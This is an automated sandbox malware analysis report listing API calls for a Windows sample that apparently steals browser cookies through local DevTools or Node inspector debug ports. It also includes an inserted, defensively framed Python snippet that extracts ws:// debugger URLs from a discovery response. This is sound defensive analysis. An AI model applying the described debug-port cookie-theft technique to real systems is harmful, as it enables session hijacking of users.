                                • lstrcpy.KERNEL32(00000000,?), ref: 010049B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 010049E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: c8f299a764bf5178e9b6a9eb14ae692a7721506fc06d5305d0d89a5a8e700999
                                • Instruction ID: 9440814701e83e1e06d3caa8231f313074be0f379a8bdf7f641a69880935456d
                                • Opcode Fuzzy Hash: c8f299a764bf5178e9b6a9eb14ae692a7721506fc06d5305d0d89a5a8e700999
                                • Instruction Fuzzy Hash: B5B1B631A102195BEF72EF79DC899AE7BF8AF40300F044468FA85E7291DB78DD419794
                                APIs
                                  • Part of subcall function 00FF90C0: InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF90DF
                                  • Part of subcall function 00FF90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FF90FC
                                  • Part of subcall function 00FF90C0: InternetCloseHandle.WININET(00000000), ref: 00FF9109
                                • strlen.MSVCRT ref: 00FF92E1
                                • strlen.MSVCRT ref: 00FF92FA
                                  • Part of subcall function 00FF8980: std::_Xinvalid_argument.LIBCPMT ref: 00FF8996
                                • strlen.MSVCRT ref: 00FF9399
                                • strlen.MSVCRT ref: 00FF93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00FF9547
                                • lstrcat.KERNEL32(?,01021794), ref: 00FF9559
                                • lstrcat.KERNEL32(?,?), ref: 00FF956A
                                • lstrcat.KERNEL32(?,01024B98), ref: 00FF957C
                                • lstrcat.KERNEL32(?,?), ref: 00FF958D
                                • lstrcat.KERNEL32(?,.txt), ref: 00FF959F
                                • lstrlen.KERNEL32(?), ref: 00FF95B6
                                • lstrlen.KERNEL32(?), ref: 00FF95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 95012ab9dc16eb2bada67172d87a416a9b46fc4cffa74fdb376e456ee74138a4
                                • Instruction ID: 66cefe134fd343dd7527c61270c0f77063f4eab4042788fcf9727ec0fbfaf242
                                • Opcode Fuzzy Hash: 95012ab9dc16eb2bada67172d87a416a9b46fc4cffa74fdb376e456ee74138a4
                                • Instruction Fuzzy Hash: 2DE12771E0421CDBDF60DFA8D884AEDBBB5BF48300F1444A9E609A7291DB789E45DF90
                                APIs
                                • memset.MSVCRT ref: 0100D9A1
                                • memset.MSVCRT ref: 0100D9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100D9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100DA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 0100DA1C
                                • lstrcat.KERNEL32(?,00D6EEB0), ref: 0100DA36
                                • lstrcat.KERNEL32(?,?), ref: 0100DA4A
                                • lstrcat.KERNEL32(?,00D6D248), ref: 0100DA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100DA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0100DA95
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100DAFE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: f5098ffcb71fb8ca603d525a5be37d3e2d827a4132ab0558f07c3258c44209cd
                                • Instruction ID: d1b205e7b40038895abbe028ce8e65b27e1d80bea9c767ce522848f9f07ba1ff
                                • Opcode Fuzzy Hash: f5098ffcb71fb8ca603d525a5be37d3e2d827a4132ab0558f07c3258c44209cd
                                • Instruction Fuzzy Hash: C6B1A47191021DAFEF61EFA4DC889EE7BB9BF48300F0445A8F645E7250DB789A44DB60
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB3D9
                                • lstrlen.KERNEL32(01024C50), ref: 00FFB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB474
                                • lstrcat.KERNEL32(00000000,01024C50), ref: 00FFB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB4A9
                                • lstrlen.KERNEL32(00000000), ref: 00FFB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB587
                                • lstrlen.KERNEL32(01024AD4), ref: 00FFB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB622
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 00FFB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB65E
                                • lstrlen.KERNEL32(?), ref: 00FFB767
                                • lstrlen.KERNEL32(?), ref: 00FFB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFB79E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 58c192e309b2908692bb85943ed08060e02ca39c5efd1ef4779e43287ac0e440
                                • Instruction ID: 88db11602f94d54cc5c9076974d8524ba984829d1c21f0cb82d9e65c616b108e
                                • Opcode Fuzzy Hash: 58c192e309b2908692bb85943ed08060e02ca39c5efd1ef4779e43287ac0e440
                                • Instruction Fuzzy Hash: 78026C30A01209DFCB35DF25D989A7EB7B4AF40324F18806DE6099B275D779DC82EB80
                                APIs
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • RegOpenKeyExA.ADVAPI32(?,00D6B7B8,00000000,00020019,?), ref: 010137BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 010137F7
                                • wsprintfA.USER32 ref: 01013822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 01013840
                                • RegCloseKey.ADVAPI32(?), ref: 0101384E
                                • RegCloseKey.ADVAPI32(?), ref: 01013858
                                • RegQueryValueExA.ADVAPI32(?,00D6E940,00000000,000F003F,?,?), ref: 010138A1
                                • lstrlen.KERNEL32(?), ref: 010138B6
                                • RegQueryValueExA.ADVAPI32(?,00D6EB50,00000000,000F003F,?,00000400), ref: 01013927
                                • RegCloseKey.ADVAPI32(?), ref: 01013972
                                • RegCloseKey.ADVAPI32(?), ref: 01013989
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 8185ed884f7c5051bdba2659a6dd0e1356456bddfdbf588d112a8987d7be5517
                                • Instruction ID: 4980094a18936f4010afb2a97f18a2b9700e2d83b80bb775c0530e149d04a568
                                • Opcode Fuzzy Hash: 8185ed884f7c5051bdba2659a6dd0e1356456bddfdbf588d112a8987d7be5517
                                • Instruction Fuzzy Hash: F1918272D002199FCB20DF98D9849EEB7F9FF48314F1485A9E609AB205D739AD46CF90
                                APIs
                                • InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FF90FC
                                • InternetCloseHandle.WININET(00000000), ref: 00FF9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00FF9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00FF9197
                                • InternetCloseHandle.WININET(00000000), ref: 00FF91A2
                                • InternetCloseHandle.WININET(00000000), ref: 00FF91A9
                                • strlen.MSVCRT ref: 00FF91BA
                                • strlen.MSVCRT ref: 00FF91ED
                                • strlen.MSVCRT ref: 00FF922E
                                • strlen.MSVCRT ref: 00FF924C
                                  • Part of subcall function 00FF8980: std::_Xinvalid_argument.LIBCPMT ref: 00FF8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: a0fc2df446c107ae4d57cc1a290a6b47ed0ced8ca64b4d995f20848028cd4111
                                • Instruction ID: b8a9ba6678104873944285746bf2e3daeba138216450a39b5ea7755e9c9a9d31
                                • Opcode Fuzzy Hash: a0fc2df446c107ae4d57cc1a290a6b47ed0ced8ca64b4d995f20848028cd4111
                                • Instruction Fuzzy Hash: 4551E671A402096BEB20DFA9DC49FEEB7F9DF48710F140069F644E7290DBB4EA448B65
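The function above fetches http://localhost:9229/json over WinINet and, judging by its string references, scans the body for `"webSocketDebuggerUrl":` and then `"ws://`. Port 9229 is the default listening port of the Node.js inspector, and `/json` is the DevTools-protocol discovery document that advertises the WebSocket debug endpoint; anything that can connect to that ws:// URL can run `Runtime.evaluate` inside the debuggee. The Python below is an added example written for this page (editor's code, not logic recovered from the sample and not part of the Joe Sandbox report): it reproduces the string-scan extraction on a constructed `/json` response, cross-checks it against a real JSON parse, and reports whether a ws:// debug target was advertised. The response body is constructed; the field names are the documented DevTools discovery ones.

```python
import json

# Constructed sample of a Node.js inspector / DevTools discovery response
# (GET http://localhost:9229/json). Not captured from the analysed sample.
SAMPLE_JSON_RESPONSE = """[ {
  "description": "node.js instance",
  "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?experiments=true&v8only=true&ws=localhost:9229/3b1c2d3e-0000-4000-8000-000000000001",
  "id": "3b1c2d3e-0000-4000-8000-000000000001",
  "title": "app.js",
  "type": "node",
  "url": "file:///C:/app/app.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/3b1c2d3e-0000-4000-8000-000000000001"
} ]
"""

# The two literals referenced by the function record (String ID line).
KEY = '"webSocketDebuggerUrl":'
WS_PREFIX = '"ws://'


def extract_ws_urls_by_scan(body: str) -> list[str]:
    """Mimic the strlen/substring scan suggested by the disassembly:
    locate the key, then the '"ws://' marker, then read up to the closing quote.
    Returns every ws:// URL found, in document order."""
    urls = []
    pos = 0
    while True:
        k = body.find(KEY, pos)
        if k < 0:
            break
        w = body.find(WS_PREFIX, k + len(KEY))
        if w < 0:
            break
        start = w + 1                       # skip the opening quote, keep "ws://"
        end = body.find('"', start)
        if end < 0:
            break                           # unterminated string: stop, do not guess
        urls.append(body[start:end])
        pos = end + 1
    return urls


def extract_ws_urls_by_json(body: str) -> list[str]:
    """Reference extraction with a real JSON parser, used to cross-check the scan.
    A non-JSON or non-array body yields no targets."""
    try:
        targets = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict)
            and str(t.get("webSocketDebuggerUrl", "")).startswith("ws://")]


def debugger_exposed(body: str) -> bool:
    """True when the discovery endpoint advertised at least one ws:// debug target."""
    return bool(extract_ws_urls_by_json(body)) or bool(extract_ws_urls_by_scan(body))


if __name__ == "__main__":
    print(extract_ws_urls_by_scan(SAMPLE_JSON_RESPONSE))
    print("exposed:", debugger_exposed(SAMPLE_JSON_RESPONSE))
```

The scan version is deliberately the fragile one: it is the shape of what the binary does, and it will happily pick a `ws://` string out of any field that follows the key. The JSON version is what a defender's check should use. On a host you own, the same check against `http://127.0.0.1:9229/json` tells you whether a `node --inspect` process is reachable to every local user; the inspector has no authentication, so the mitigation is not to leave it listening.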
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 010116A1
                                • lstrcpy.KERNEL32(00000000,00D5A0A0), ref: 010116CC
                                • lstrlen.KERNEL32(?), ref: 010116D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010116F6
                                • lstrcat.KERNEL32(00000000,?), ref: 01011704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101172A
                                • lstrlen.KERNEL32(00D6E468), ref: 0101173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011762
                                • lstrcat.KERNEL32(00000000,00D6E468), ref: 0101176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011792
                                • ShellExecuteEx.SHELL32(?), ref: 010117CD
                                • ExitProcess.KERNEL32 ref: 01011803
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: a03c342cd039d19ada5e3f322c72e7109aa113bfe093910d737084d9c80c2f93
                                • Instruction ID: c2877fe9c745d82b3eada1425aafd320145cf447aaf3f07d19d4a2238e48c27c
                                • Opcode Fuzzy Hash: a03c342cd039d19ada5e3f322c72e7109aa113bfe093910d737084d9c80c2f93
                                • Instruction Fuzzy Hash: F451B470901219ABDB71DFB8D888A9EBBFDBF48300F044165E705E3355DB78AA01DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0100F026
                                • lstrlen.KERNEL32(00000000), ref: 0100F035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 0100F053
                                • StrStrA.SHLWAPI(00000000,?), ref: 0100F081
                                • lstrlen.KERNEL32(?), ref: 0100F094
                                • lstrlen.KERNEL32(00000000), ref: 0100F0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 0100F0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 0100F13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: d8642fd4943c22b9cc7845cba88ec7072c3e2f272ffe3b104ec7e6b651a952c4
                                • Instruction ID: 31b13c17a52f6486208602c1b0b70f38a3c1ee0daf5360d8739a593a32320842
                                • Opcode Fuzzy Hash: d8642fd4943c22b9cc7845cba88ec7072c3e2f272ffe3b104ec7e6b651a952c4
                                • Instruction Fuzzy Hash: F451B23191021A9FEB72EF78DC49ABE7BE4AF51304F044158FA85DB296DB78DC01A790
                                APIs
